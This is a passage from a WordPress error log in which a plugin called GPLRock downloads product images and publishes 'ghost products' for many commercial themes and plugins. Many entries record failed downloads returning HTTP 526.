UTC] GPLRock: Using pre-downloaded image for product callegari-builders-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-204b80a6.webp [31-Mar-2026 01:25:43 UTC] GPLRock: Ghost product published with image - Product ID: callegari-builders-elementor-template-kit [31-Mar-2026 01:25:46 UTC] GPLRock: Image downloaded successfully for product caldwell-tour-travel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9d5aee2.webp [31-Mar-2026 01:25:46 UTC] GPLRock: Using pre-downloaded image for product caldwell-tour-travel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9d5aee2.webp [31-Mar-2026 01:25:46 UTC] GPLRock: Ghost product published with image - Product ID: caldwell-tour-travel-elementor-template-kit [31-Mar-2026 01:25:48 UTC] GPLRock: Image downloaded successfully for product byra-creative-agency-modern-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb924f89.webp [31-Mar-2026 01:25:48 UTC] GPLRock: Using pre-downloaded image for product byra-creative-agency-modern-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb924f89.webp [31-Mar-2026 01:25:48 UTC] GPLRock: Ghost product published with image - Product ID: byra-creative-agency-modern-portfolio-elementor-template-kit [31-Mar-2026 01:25:55 UTC] GPLRock: Image downloaded successfully for product bxsco-business-multipurpose-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d21410f4.webp [31-Mar-2026 01:25:55 UTC] GPLRock: Using pre-downloaded image for product bxsco-business-multipurpose-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d21410f4.webp [31-Mar-2026 01:25:55 UTC] GPLRock: Ghost product published with image - Product ID: bxsco-business-multipurpose-elementor-template-kit [01-Apr-2026 01:12:16 UTC] GPLRock: Image download failed for product arica-portfolio-wordpress-theme-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:18 UTC] GPLRock: Image downloaded successfully for product luxa-luxury-black-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac0e1a90.jpg [01-Apr-2026 01:12:18 UTC] GPLRock: Image download failed for product arica-portfolio-wordpress-theme-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:18 UTC] GPLRock: Using pre-downloaded image for product luxa-luxury-black-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac0e1a90.jpg [01-Apr-2026 01:12:18 UTC] GPLRock: Ghost product published with image - Product ID: luxa-luxury-black-multipurpose-wordpress-theme [01-Apr-2026 01:12:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-eu-vat-b2b (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db8669f3.jpg [01-Apr-2026 01:12:20 UTC] GPLRock: Using pre-downloaded image for product woocommerce-eu-vat-b2b: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db8669f3.jpg [01-Apr-2026 01:12:20 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-eu-vat-b2b [01-Apr-2026 01:12:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arica--portfolio-wordpress-theme-for-creatives-7358.webp for product arica-portfolio-wordpress-theme-for-creatives after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:20 UTC] GPLRock: Image download failed for product arica-portfolio-wordpress-theme-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:22 UTC] GPLRock: Image downloaded successfully for product docy-documentation-knowledge-base-wordpress-theme-with-helpdesk-forum (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f72423c6.avif [01-Apr-2026 01:12:22 UTC] GPLRock: Using pre-downloaded image for product docy-documentation-knowledge-base-wordpress-theme-with-helpdesk-forum: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f72423c6.avif [01-Apr-2026 01:12:22 UTC] GPLRock: Ghost product published with image - Product ID: docy-documentation-knowledge-base-wordpress-theme-with-helpdesk-forum [01-Apr-2026 01:12:22 UTC] GPLRock: Image download failed for product arica-portfolio-wordpress-theme-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:23 UTC] GPLRock: Image downloaded successfully for product fildisi-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44ce0af8.jpg [01-Apr-2026 01:12:23 UTC] GPLRock: Using pre-downloaded image for product fildisi-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44ce0af8.jpg [01-Apr-2026 01:12:23 UTC] GPLRock: Ghost product published with image - Product ID: fildisi-responsive-multi-purpose-wordpress-theme [01-Apr-2026 01:12:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arica--portfolio-wordpress-theme-for-creatives-7358.webp for product arica-portfolio-wordpress-theme-for-creatives after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:24 UTC] GPLRock WARNING: Image download failed for product arica-portfolio-wordpress-theme-for-creatives. URL: https://meldwp.com/wp-content/uploads/arica--portfolio-wordpress-theme-for-creatives-7358.webp [01-Apr-2026 01:12:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arica-portfolio-wordpress-theme-for-creatives [01-Apr-2026 01:12:25 UTC] GPLRock: Image download failed for product tuition-education-online-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:25 UTC] GPLRock: Image downloaded successfully for product frinkle-digital-design-agency-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4869a996.jpg [01-Apr-2026 01:12:25 UTC] GPLRock: Using pre-downloaded image for product frinkle-digital-design-agency-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4869a996.jpg [01-Apr-2026 01:12:25 UTC] GPLRock: Ghost product published with image - Product ID: frinkle-digital-design-agency-elementor-pro-template-kit [01-Apr-2026 01:12:27 UTC] GPLRock: Image downloaded successfully for product automatic-css-utility-framework-for-wordpress-page-builders (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fd43fb1.jpg [01-Apr-2026 01:12:27 UTC] GPLRock: Using pre-downloaded image for product automatic-css-utility-framework-for-wordpress-page-builders: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fd43fb1.jpg [01-Apr-2026 01:12:27 UTC] GPLRock: Ghost product published with image - Product ID: automatic-css-utility-framework-for-wordpress-page-builders [01-Apr-2026 01:12:27 UTC] GPLRock: Image download failed for product tuition-education-online-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuition-education--online-course-wordpress-theme-10487.webp for product tuition-education-online-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:29 UTC] GPLRock: Image download failed for product tuition-education-online-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:31 UTC] GPLRock: Image download failed for product tuition-education-online-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuition-education--online-course-wordpress-theme-10487.webp for product tuition-education-online-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:33 UTC] GPLRock WARNING: Image download failed for product tuition-education-online-course-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tuition-education--online-course-wordpress-theme-10487.webp [01-Apr-2026 01:12:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tuition-education-online-course-wordpress-theme [01-Apr-2026 01:12:33 UTC] GPLRock: Image download failed for product fashionly-fashion-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:35 UTC] GPLRock: Image downloaded successfully for product really-simple-ssl-pro-improve-security-with-really-simple-ssl-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3589f69a.jpg [01-Apr-2026 01:12:35 UTC] GPLRock: Using pre-downloaded image for product really-simple-ssl-pro-improve-security-with-really-simple-ssl-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3589f69a.jpg [01-Apr-2026 01:12:35 UTC] GPLRock: Ghost product published with image - Product ID: really-simple-ssl-pro-improve-security-with-really-simple-ssl-pro [01-Apr-2026 01:12:35 UTC] GPLRock: Image download failed for product fashionly-fashion-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fashionly---fashion-blog-theme-1958.webp for product fashionly-fashion-blog-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:38 UTC] GPLRock: Image download failed for product fashionly-fashion-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:38 UTC] GPLRock: Image downloaded successfully for product car-rental-system-native-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99aa2069.jpg [01-Apr-2026 01:12:38 UTC] GPLRock: Using pre-downloaded image for product car-rental-system-native-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99aa2069.jpg [01-Apr-2026 01:12:38 UTC] GPLRock: Ghost product published with image - Product ID: car-rental-system-native-wordpress-plugin [01-Apr-2026 01:12:40 UTC] GPLRock: Image downloaded successfully for product woocommerce-worldpay-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ae30086.png [01-Apr-2026 01:12:40 UTC] GPLRock: Image download failed for product fashionly-fashion-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:40 UTC] GPLRock: Using pre-downloaded image for product woocommerce-worldpay-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ae30086.png [01-Apr-2026 01:12:40 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-worldpay-gateway [01-Apr-2026 01:12:41 UTC] GPLRock: Image downloaded successfully for product woocommerce-bookings-availability (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e504c998.jpg [01-Apr-2026 01:12:42 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bookings-availability: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e504c998.jpg [01-Apr-2026 01:12:42 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bookings-availability [01-Apr-2026 01:12:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fashionly---fashion-blog-theme-1958.webp for product fashionly-fashion-blog-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:42 UTC] GPLRock WARNING: Image download failed for product fashionly-fashion-blog-theme. URL: https://meldwp.com/wp-content/uploads/fashionly---fashion-blog-theme-1958.webp [01-Apr-2026 01:12:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fashionly-fashion-blog-theme [01-Apr-2026 01:12:42 UTC] GPLRock: Image download failed for product app-landing-wordpress-theme-appro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:44 UTC] GPLRock: Image download failed for product app-landing-wordpress-theme-appro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/app-landing-wordpress-theme-appro-3326.webp for product app-landing-wordpress-theme-appro after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:46 UTC] GPLRock: Image download failed for product app-landing-wordpress-theme-appro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:48 UTC] GPLRock: Image download failed for product app-landing-wordpress-theme-appro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/app-landing-wordpress-theme-appro-3326.webp for product app-landing-wordpress-theme-appro after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:50 UTC] GPLRock WARNING: Image download failed for product app-landing-wordpress-theme-appro. URL: https://meldwp.com/wp-content/uploads/app-landing-wordpress-theme-appro-3326.webp [01-Apr-2026 01:12:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: app-landing-wordpress-theme-appro [01-Apr-2026 01:12:51 UTC] GPLRock: Image download failed for product arcdeco-architecture-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:53 UTC] GPLRock: Image download failed for product arcdeco-architecture-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arcdeco--architecture--interior-design-wordpress-theme-16572.webp for product arcdeco-architecture-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:55 UTC] GPLRock: Image download failed for product arcdeco-architecture-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:57 UTC] GPLRock: Image download failed for product arcdeco-architecture-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:12:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arcdeco--architecture--interior-design-wordpress-theme-16572.webp for product arcdeco-architecture-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:12:59 UTC] GPLRock WARNING: Image download failed for product arcdeco-architecture-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/arcdeco--architecture--interior-design-wordpress-theme-16572.webp [01-Apr-2026 01:12:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arcdeco-architecture-interior-design-wordpress-theme [01-Apr-2026 01:12:59 UTC] GPLRock: Image download failed for product chirokind-chiropractor-and-physical-therapy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:01 UTC] GPLRock: Image download failed for product chirokind-chiropractor-and-physical-therapy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chirokind---chiropractor-and-physical-therapy-wordpress-theme-21523.webp for product chirokind-chiropractor-and-physical-therapy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:04 UTC] GPLRock: Image download failed for product chirokind-chiropractor-and-physical-therapy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:06 UTC] GPLRock: Image download failed for product chirokind-chiropractor-and-physical-therapy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chirokind---chiropractor-and-physical-therapy-wordpress-theme-21523.webp for product chirokind-chiropractor-and-physical-therapy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:08 UTC] GPLRock WARNING: Image download failed for product chirokind-chiropractor-and-physical-therapy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/chirokind---chiropractor-and-physical-therapy-wordpress-theme-21523.webp [01-Apr-2026 01:13:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chirokind-chiropractor-and-physical-therapy-wordpress-theme [01-Apr-2026 01:13:08 UTC] GPLRock: Image download failed for product laramiss-elementor-multipurpose-luxury-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:10 UTC] GPLRock: Image download failed for product laramiss-elementor-multipurpose-luxury-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/laramiss--elementor-multipurpose-luxury-wordpress-theme-14358.webp for product laramiss-elementor-multipurpose-luxury-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:12 UTC] GPLRock: Image download failed for product laramiss-elementor-multipurpose-luxury-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:14 UTC] GPLRock: Image download failed for product laramiss-elementor-multipurpose-luxury-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/laramiss--elementor-multipurpose-luxury-wordpress-theme-14358.webp for product laramiss-elementor-multipurpose-luxury-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:17 UTC] GPLRock WARNING: Image download failed for product laramiss-elementor-multipurpose-luxury-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/laramiss--elementor-multipurpose-luxury-wordpress-theme-14358.webp [01-Apr-2026 01:13:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: laramiss-elementor-multipurpose-luxury-wordpress-theme [01-Apr-2026 01:13:17 UTC] GPLRock: Image download failed for product infinite-corporate-business-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:19 UTC] GPLRock: Image download failed for product infinite-corporate-business-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infinite---corporate-business-wordpress-6394.webp for product infinite-corporate-business-wordpress after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:21 UTC] GPLRock: Image download failed for product infinite-corporate-business-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:23 UTC] GPLRock: Image download failed for product infinite-corporate-business-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infinite---corporate-business-wordpress-6394.webp for product infinite-corporate-business-wordpress after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:25 UTC] GPLRock WARNING: Image download failed for product infinite-corporate-business-wordpress. URL: https://meldwp.com/wp-content/uploads/infinite---corporate-business-wordpress-6394.webp [01-Apr-2026 01:13:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infinite-corporate-business-wordpress [01-Apr-2026 01:13:25 UTC] GPLRock: Image download failed for product asteno-wine-vineyard-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:28 UTC] GPLRock: Image download failed for product asteno-wine-vineyard-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/asteno---wine--vineyard-wp-theme-9006.webp for product asteno-wine-vineyard-wp-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:30 UTC] GPLRock: Image download failed for product asteno-wine-vineyard-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:32 UTC] GPLRock: Image download failed for product asteno-wine-vineyard-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/asteno---wine--vineyard-wp-theme-9006.webp for product asteno-wine-vineyard-wp-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:34 UTC] GPLRock WARNING: Image download failed for product asteno-wine-vineyard-wp-theme. URL: https://meldwp.com/wp-content/uploads/asteno---wine--vineyard-wp-theme-9006.webp [01-Apr-2026 01:13:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: asteno-wine-vineyard-wp-theme [01-Apr-2026 01:13:34 UTC] GPLRock: Image download failed for product lovewish-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:36 UTC] GPLRock: Image download failed for product lovewish-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lovewish---nonprofit--charity-wordpress-theme-13517.webp for product lovewish-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:38 UTC] GPLRock: Image download failed for product lovewish-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:41 UTC] GPLRock: Image download failed for product lovewish-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [01-Apr-2026 01:13:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lovewish---nonprofit--charity-wordpress-theme-13517.webp for product lovewish-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [01-Apr-2026 01:13:43 UTC] GPLRock WARNING: Image download failed for product lovewish-nonprofit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lovewish---nonprofit--charity-wordpress-theme-13517.webp [01-Apr-2026 01:13:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lovewish-nonprofit-charity-wordpress-theme [02-Apr-2026 01:11:49 UTC] GPLRock: Image download failed for product smsifywoo-send-sms-notification-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:11:49 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-compare-products (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53879d5c.jpg [02-Apr-2026 01:11:49 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-compare-products: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53879d5c.jpg [02-Apr-2026 01:11:49 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-compare-products [02-Apr-2026 01:11:51 UTC] GPLRock: Image download failed for product smsifywoo-send-sms-notification-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:11:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smsifywoo---send-sms-notification-for-woocommerce-12705.webp for product smsifywoo-send-sms-notification-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:11:53 UTC] GPLRock: Image download failed for product smsifywoo-send-sms-notification-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:11:55 UTC] GPLRock: Image download failed for product smsifywoo-send-sms-notification-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:11:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smsifywoo---send-sms-notification-for-woocommerce-12705.webp for product smsifywoo-send-sms-notification-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:11:57 UTC] GPLRock WARNING: Image download failed for product smsifywoo-send-sms-notification-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/smsifywoo---send-sms-notification-for-woocommerce-12705.webp [02-Apr-2026 01:11:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smsifywoo-send-sms-notification-for-woocommerce [02-Apr-2026 01:11:57 UTC] GPLRock: Image download failed for product paypal-payment-terminal-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:11:59 UTC] GPLRock: Image download failed for product elmastudio-tatami-wordpress-theme (attempt 1/3). HTTP Code: 0, Error: Connection timed out after 10002 milliseconds. Retrying... [02-Apr-2026 01:12:00 UTC] GPLRock: Image download failed for product paypal-payment-terminal-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paypal-payment-terminal-wordpress-24873.webp for product paypal-payment-terminal-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:02 UTC] GPLRock: Image download failed for product paypal-payment-terminal-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:03 UTC] GPLRock: Image downloaded successfully for product elmastudio-tatami-wordpress-theme (attempt 2) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61da9733.jpg [02-Apr-2026 01:12:04 UTC] GPLRock: Using pre-downloaded image for product elmastudio-tatami-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61da9733.jpg [02-Apr-2026 01:12:04 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-tatami-wordpress-theme [02-Apr-2026 01:12:04 UTC] GPLRock: Image download failed for product paypal-payment-terminal-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:05 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-coupon-email-system-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b25c6fb.jpg [02-Apr-2026 01:12:06 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-coupon-email-system-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b25c6fb.jpg [02-Apr-2026 01:12:06 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-coupon-email-system-premium [02-Apr-2026 01:12:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paypal-payment-terminal-wordpress-24873.webp for product paypal-payment-terminal-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:06 UTC] GPLRock WARNING: Image download failed for product paypal-payment-terminal-wordpress. URL: https://meldwp.com/wp-content/uploads/paypal-payment-terminal-wordpress-24873.webp [02-Apr-2026 01:12:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paypal-payment-terminal-wordpress [02-Apr-2026 01:12:06 UTC] GPLRock: Image download failed for product paylane-secure-form-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:08 UTC] GPLRock: Image download failed for product paylane-secure-form-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paylane-secure-form-gateway-for-woocommerce-8838.webp for product paylane-secure-form-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:10 UTC] GPLRock: Image download failed for product paylane-secure-form-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:11 UTC] GPLRock: Image downloaded successfully for product imagelinks-interactive-image-builder-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8411b4e2.jpg [02-Apr-2026 01:12:11 UTC] GPLRock: Using pre-downloaded image for product imagelinks-interactive-image-builder-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8411b4e2.jpg [02-Apr-2026 01:12:11 UTC] GPLRock: Ghost product published with image - Product ID: imagelinks-interactive-image-builder-for-wordpress [02-Apr-2026 01:12:12 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-gravity-forms-checkout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ce4a18b.jpg [02-Apr-2026 01:12:12 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-gravity-forms-checkout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ce4a18b.jpg [02-Apr-2026 01:12:12 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-gravity-forms-checkout [02-Apr-2026 01:12:13 UTC] GPLRock: Image download failed for product paylane-secure-form-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paylane-secure-form-gateway-for-woocommerce-8838.webp for product paylane-secure-form-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:15 UTC] GPLRock WARNING: Image download failed for product paylane-secure-form-gateway-for-woocommerce. URL: 